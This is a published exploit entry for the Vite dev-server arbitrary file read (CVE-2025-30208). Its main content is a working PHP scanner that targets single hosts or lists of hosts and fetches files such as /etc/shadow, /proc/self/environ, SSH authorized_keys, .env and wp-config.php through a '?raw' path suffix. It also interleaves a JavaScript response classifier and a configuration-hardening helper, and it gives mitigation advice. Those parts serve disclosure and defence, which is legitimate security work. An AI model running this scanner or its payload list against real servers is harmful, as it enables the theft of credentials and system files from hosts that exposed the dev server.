Vite 6.2.2 Arbitrary File Read

Published: 10 Mar 2026 00:00:00
Reported by: indoushka
Type: packetstorm
Source: packetstorm.news
Vite 6.2.2 arbitrary file read via crafted path ?raw; PHP PoC tests targets and retrieves local files.

Related (GithubExploit entries)

Exploit for CVE-2025-30208 - 26 Mar 2025 15:42
Exploit for CVE-2025-30208 - 26 Mar 2025 19:06
Exploit for CVE-2025-30208 - 26 Mar 2025 17:14
Exploit for Improper Access Control in Vitejs Vite - 4 Mar 2026 07:29
Exploit for CVE-2025-30208 - 3 Apr 2025 11:46
Exploit for CVE-2025-30208 - 27 Mar 2025 12:36
Exploit for CVE-2025-30208 - 27 Mar 2025 12:55
Exploit for CVE-2025-30208 - 24 Apr 2025 10:53
Exploit for CVE-2025-30208 - 25 Jun 2025 19:04
Exploit for CVE-2025-30208 - 31 Mar 2025 13:43
    =============================================================================================================================================
    | # Title     : Vite 6.2.2 Arbitrary File Read – PHP Exploit                                                                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://vite.dev/                                                                                                           |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/190227/ & CVE-2025-30208
    
    [+] Summary
    
    Vite's development server contains an arbitrary file read vulnerability (CVE-2025-30208; Vite 6.2.2 and earlier unpatched releases): a client that can reach the dev server can read files outside the project root by requesting a crafted path with a raw-import query suffix, bypassing the server.fs.deny check. Only the dev server is affected, not the built production assets, and only when the dev server is reachable from the network (for example when started with --host or configured with server.host). This PoC automates the check for a single target or a list of targets and attempts to retrieve local files by appending ?raw.
    
    Technical Details:
    
    The PoC sends HTTP GET requests to TARGET + FILE_PATH + "?raw".
    
    When the response code is HTTP 200 and the response body is non-empty, the PoC considers the file retrievable (vulnerable). Two caveats apply when reading its output. First, a Vite dev server answers unknown paths with index.html and HTTP 200 for any client whose Accept header admits text/html, which cURL's default Accept: */* does, so a non-empty 200 is not by itself proof of a file read; check that the body is not the application's HTML shell. Second, a successful ?raw transform is returned as a JavaScript module of the form export default "<file contents>", so the snippet the PoC prints is the JSON-encoded file text rather than the raw bytes.
    
    The upstream advisory for CVE-2025-30208 describes the bypass of server.fs.deny with a trailing ?raw?? or ?import&raw?? suffix, not a bare ?raw; a 403 from a target probed with ?raw alone therefore does not by itself show that the target is patched.
    
    The PoC uses cURL (in PHP) and provides toggles for verbose output, an output file, and trying multiple payloads.
    
    The PHP script (poc.php) is provided below.
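The check described above, as an added example that is not part of the original PoC and not Vite's own code: the same URL construction as the PHP build_url(), followed by a response triage that separates a real ?raw file read from the dev server's index.html fallback and from a 403 deny, and recovers the file text from the export default "..." module wrapper. The sample responses are constructed for this example, not captured from any host; the module shape and the HTML fallback behaviour are Vite's, while the verdict names and helper functions are this example's own.

```javascript
'use strict';

// Build the probe URL the way the PHP PoC's build_url() does:
// target + path + "?raw", backslashes turned into slashes and exactly one
// slash between host and path.
function buildProbeUrl(target, filePath) {
  const base = target.replace(/\/+$/, '');
  let p = filePath.replace(/\\/g, '/');
  if (!p.startsWith('/')) p = '/' + p;
  return base + p + '?raw';
}

// A successful ?raw transform comes back as a JS module of the form
//   export default "<file contents as a JSON string literal>"
// Recover the original file text from that wrapper, or null if the body
// is not such a module.
function extractRawContent(body) {
  const m = /^\s*export default ("(?:[^"\\]|\\.)*")\s*;?\s*$/s.exec(body);
  if (!m) return null;
  try {
    return JSON.parse(m[1]);
  } catch {
    return null;
  }
}

// Triage one response. The PoC reports "vulnerable" on any HTTP 200 with a
// non-empty body; this separates the cases a practitioner actually needs:
//   file-read     : 200 with an `export default "..."` module, i.e. the server read the file
//   html-fallback : 200 but the body is the dev server's index.html (served for
//                   unknown paths when Accept admits text/html, as cURL's */* does)
//   denied        : 403 from the server.fs allow/deny check
//   not-found     : 404
//   other         : anything else, needs manual review
function classifyResponse(res) {
  const body = typeof res.body === 'string' ? res.body : '';
  const headers = res.headers || {};
  const ctype = String(headers['content-type'] || '').toLowerCase();
  if (res.status === 403) return { verdict: 'denied', content: null };
  if (res.status === 404) return { verdict: 'not-found', content: null };
  if (res.status === 200 && body.length > 0) {
    const content = extractRawContent(body);
    if (content !== null) return { verdict: 'file-read', content };
    if (ctype.includes('text/html') || /^\s*<(?:!doctype|html)/i.test(body)) {
      return { verdict: 'html-fallback', content: null };
    }
  }
  return { verdict: 'other', content: null };
}

// One report row per probe: the URL the PoC would request, the verdict and,
// for a real file read, the first line of the recovered file.
function probeReport(target, filePath, res) {
  const { verdict, content } = classifyResponse(res);
  return {
    url: buildProbeUrl(target, filePath),
    verdict,
    preview: content === null ? null : content.split('\n')[0],
  };
}

// Constructed sample responses for the three shapes above (not captured from a real host).
const SAMPLE_RESPONSES = {
  fileRead: {
    status: 200,
    headers: { 'content-type': 'text/javascript' },
    body: 'export default "root:x:0:0:root:/root:/bin/bash\\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\\n"',
  },
  htmlFallback: {
    status: 200,
    headers: { 'content-type': 'text/html' },
    body: '<!DOCTYPE html>\n<html lang="en">\n<head><script type="module" src="/src/main.js"></script></head>\n<body><div id="app"></div></body>\n</html>\n',
  },
  denied: {
    status: 403,
    headers: { 'content-type': 'text/plain' },
    body: 'The request url "/etc/passwd" is outside of Vite serving allow list.\n',
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, res] of Object.entries(SAMPLE_RESPONSES)) {
    const r = probeReport('http://localhost:5173', '/etc/passwd', res);
    console.log(`${name.padEnd(13)} ${r.verdict.padEnd(13)} ${r.url}${r.preview ? '  -> ' + r.preview : ''}`);
  }
}
```

To use it against live responses, feed classifyResponse() the status, headers and body of each GET the PoC issues; only a file-read verdict should be written to the found.txt list.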
    
    [+] Usage examples:
    
    Single target: php poc.php http://localhost:5173 --file=/etc/passwd --verbose --output=found.txt
    
    Multiple targets: php poc.php --list=targets.txt --try-all --output=found.txt
    
    [+] Impact:
    
    Disclosure of files readable by the dev-server process, such as /etc/passwd, .env files, configuration files, and other server-local secrets.
    
    [+] Mitigation:
    
    Upgrade Vite to a fixed release: 6.2.3, 6.1.2, 6.0.12, 5.4.15 or 4.5.10 (or later in the respective line).
    
    Do not expose the dev server. Keep server.host on loopback (the default) and do not start Vite with --host on an untrusted network; the advisory's bypass requires the dev server to be reachable by the attacker. Keep server.fs.strict enabled and leave the default server.fs.deny patterns (.env, .env.*, *.{crt,pem}, **/.git/**) in place.
    
    In production, do not run the dev server at all: serve the built output from a regular web server, and never expose dev-server endpoints through a reverse proxy.
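The loopback and file-system restrictions above, as an added example that is neither the advisory's nor the Vite project's own code: a hardened server block to drop into defineConfig({ server: hardenedServer }) in vite.config.js, plus a small review helper that flags the settings which re-introduce the exposure. The option names (server.host, server.strictPort, server.fs.strict, server.fs.allow, server.fs.deny) are Vite's and the deny patterns repeat Vite's defaults; the review helper, its finding strings and the REQUIRED_DENY list are this example's own.

```javascript
'use strict';

// Dev-server settings that remove the exposure the advisory relies on.
// The fs.deny entries are Vite's own defaults, repeated here so that a
// project-level override cannot silently drop them.
const hardenedServer = {
  host: '127.0.0.1', // loopback only; never `true` or '0.0.0.0' on an untrusted network
  port: 5173,
  strictPort: true,  // fail instead of silently moving to another port
  fs: {
    strict: true,    // refuse paths outside `allow` (Vite's default, made explicit)
    allow: ['.'],    // the project root; widen deliberately, per directory, if needed
    deny: ['.env', '.env.*', '*.{crt,pem}', '**/.git/**'],
  },
};

// Host values that keep the dev server on this machine only.
const LOOPBACK = new Set(['localhost', '127.0.0.1', '::1']);

// Patterns a config must not drop when it overrides fs.deny (Vite's defaults).
const REQUIRED_DENY = ['.env', '.env.*', '*.{crt,pem}', '**/.git/**'];

// Does a `server` block bind the dev server to a non-loopback address?
// Vite's default host is localhost; `true` and the wildcard addresses mean
// "listen on all interfaces". `vite --host` on the command line overrides
// the file, so package.json scripts need the same review.
function devServerIsExposed(server) {
  const host = server && server.host;
  if (host === undefined || host === null || host === false) return false;
  if (host === true) return true;
  return !LOOPBACK.has(String(host).toLowerCase());
}

// Which default deny patterns has an explicit fs.deny override removed?
// An unset fs.deny means Vite's defaults apply, so nothing is missing.
function missingDenyPatterns(server) {
  const fs = (server && server.fs) || {};
  if (!Array.isArray(fs.deny)) return [];
  return REQUIRED_DENY.filter((p) => !fs.deny.includes(p));
}

// Review helper for CI or a pre-commit hook: one finding string per setting
// that weakens the dev server's file-serving boundary.
function reviewDevServer(server) {
  const findings = [];
  if (devServerIsExposed(server)) {
    findings.push('host: dev server listens on a non-loopback address');
  }
  const fs = (server && server.fs) || {};
  if (fs.strict === false) {
    findings.push('fs.strict: false disables the serving allow list entirely');
  }
  for (const p of missingDenyPatterns(server)) {
    findings.push(`fs.deny: default pattern ${p} removed`);
  }
  return findings;
}
```

Run reviewDevServer() over the server object your vite.config.js exports; an empty result means the config keeps the dev server on loopback with the allow list and default deny patterns intact.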
    
    [+] poc
    
    Run using: php poc.php [target] [--list=domains.txt] [--file=/etc/passwd] [--verbose] [--output=found.txt] [--try-all]
    
    
    <?php
    /**
     * PoC: CVE-2025-30208 - Vite Arbitrary File Read 
     * Usage: php poc.php [target] [--list=domains.txt] [--file=/etc/passwd] [--verbose] [--output=found.txt] [--try-all]
     * by indoushka
     */
    
    ini_set('display_errors', "0");
    date_default_timezone_set('UTC');
    
    $options = getopt("", ["list:", "file:", "verbose", "output:", "try-all", "help"]);
    $argv_copy = $argv;
    array_shift($argv_copy); // remove script name
    
    // Determine positional target if provided
    $target = null;
    foreach ($argv_copy as $arg) {
        if (substr($arg, 0, 2) === "--") continue;
        if ($arg === basename(__FILE__)) continue;
        // skip known flags (handled by getopt)
        if (strpos($arg, '=') !== false) continue;
        // take first non-flag as target
        if ($target === null) $target = $arg;
    }
    
    // Default file based on OS
    $osFamily = PHP_OS_FAMILY; // "Windows", "Linux", "Darwin", etc.
    $defaultFile = ($osFamily === "Windows") ? "C:\\Windows\\System32\\drivers\\etc\\hosts" : "/etc/passwd";
    
    $fileToRead = isset($options['file']) ? $options['file'] : $defaultFile;
    $domainListFile = isset($options['list']) ? $options['list'] : null;
    $verbose = isset($options['verbose']);
    $outputFile = isset($options['output']) ? $options['output'] : null;
    $tryAll = isset($options['try-all']);
    
    // Payloads (common sensitive paths) — used when --try-all provided
    $payloads = [
        // Unix/Linux
        "/etc/passwd",
        "/etc/hosts",
        "/proc/self/environ",
        "/etc/shadow",
        "/root/.ssh/authorized_keys",
        // Common web files
        "/.env",
        "/config.php",
        "/wp-config.php",
        // Windows
        "C:\\Windows\\System32\\drivers\\etc\\hosts",
        "C:\\Windows\\win.ini"
    ];
    
    
    function build_url($target, $path) {
        // Build URL carefully: if target ends with slash and path begins with slash, avoid double slash.
        $t = rtrim($target, "/");
        // If path is absolute file path (starts with / or letter:), we still append as in original PoC: target + path + ?raw
        // But for Windows paths, convert backslashes to forward slashes for URL usage.
        $p = $path;
        $p = str_replace("\\", "/", $p);
        // Ensure there's a slash between target and path if not present
        if (strpos($p, "/") !== 0) {
            $p = "/" . $p;
        }
        return $t . $p . "?raw";
    }
    
    function http_get($url, $timeout = 5) {
        // Use cURL
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        // Ignore SSL verification like original PoC
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        // Set a reasonable User-Agent
        curl_setopt($ch, CURLOPT_USERAGENT, "PoC-CVE-2025-30208-php/1.0");
        $body = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $err = null;
        if ($body === false) {
            $err = curl_error($ch);
        }
        curl_close($ch);
        return ['code' => $http_code, 'body' => $body, 'error' => $err];
    }
    
    function report_vuln($url, $outputFile = null) {
        $msg = "[+] Vulnerable : " . $url;
        echo $msg . PHP_EOL;
        if ($outputFile) {
            file_put_contents($outputFile, $url . PHP_EOL, FILE_APPEND | LOCK_EX);
        }
    }
    
    function check_vulnerability($target, $filePath, $verbose=false, $output=null) {
        $url = build_url($target, $filePath);
        echo "[*] Testing: {$url}" . PHP_EOL;
        $res = http_get($url, 5);
        if ($res['error']) {
            echo "[!] Error testing {$url}: " . $res['error'] . PHP_EOL;
            return;
        }
        if ($res['code'] === 200 && strlen((string)$res['body']) > 0) {
            report_vuln($url, $output);
            if ($verbose) {
                echo PHP_EOL . "--- File Content Start ---" . PHP_EOL;
                // Print first 500 chars safely
                $snippet = mb_substr((string)$res['body'], 0, 500);
                echo $snippet . PHP_EOL;
                echo "--- File Content End ---" . PHP_EOL . PHP_EOL;
            }
        } else {
            echo "[-] Not vulnerable or file does not exist: {$url} (HTTP {$res['code']})" . PHP_EOL;
        }
    }
    
    function check_multiple_domains($filePath, $domainListFile, $verbose=false, $output=null, $tryAll=false, $payloads=[]) {
        if (!file_exists($domainListFile)) {
            echo "[!] Error: The file '{$domainListFile}' does not exist." . PHP_EOL;
            return;
        }
        $lines = file($domainListFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        foreach ($lines as $domain) {
            $domain = trim($domain);
            if ($domain === "") continue;
            if ($tryAll && !empty($payloads)) {
                foreach ($payloads as $p) {
                    check_vulnerability($domain, $p, $verbose, $output);
                }
            } else {
                check_vulnerability($domain, $filePath, $verbose, $output);
            }
        }
    }
    
    // Main execution flow
    if (isset($options['help'])) {
        echo "Usage: php " . basename(__FILE__) . " [target] [--list=domains.txt] [--file=/etc/passwd] [--verbose] [--output=found.txt] [--try-all]" . PHP_EOL;
        exit(0);
    }
    
    if ($domainListFile) {
        check_multiple_domains($fileToRead, $domainListFile, $verbose, $outputFile, $tryAll, $payloads);
    } elseif ($target) {
        if ($tryAll) {
            foreach ($payloads as $p) {
                check_vulnerability($target, $p, $verbose, $outputFile);
            }
        } else {
            check_vulnerability($target, $fileToRead, $verbose, $outputFile);
        }
    } else {
        echo "Please provide a target URL or a domain list file. Example:" . PHP_EOL;
        echo "php " . basename(__FILE__) . " http://localhost:5173 --file=/etc/passwd --verbose --output=found.txt" . PHP_EOL;
        echo "php " . basename(__FILE__) . " --list=targets.txt --try-all --output=found.txt" . PHP_EOL;
        exit(1);
    }
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Scores (Vulners, 10 Mar 2026)

Vulners AI Score: 6.6 (medium risk)
CVSS 3.1: 5.3 - 7.5
EPSS: 0.89847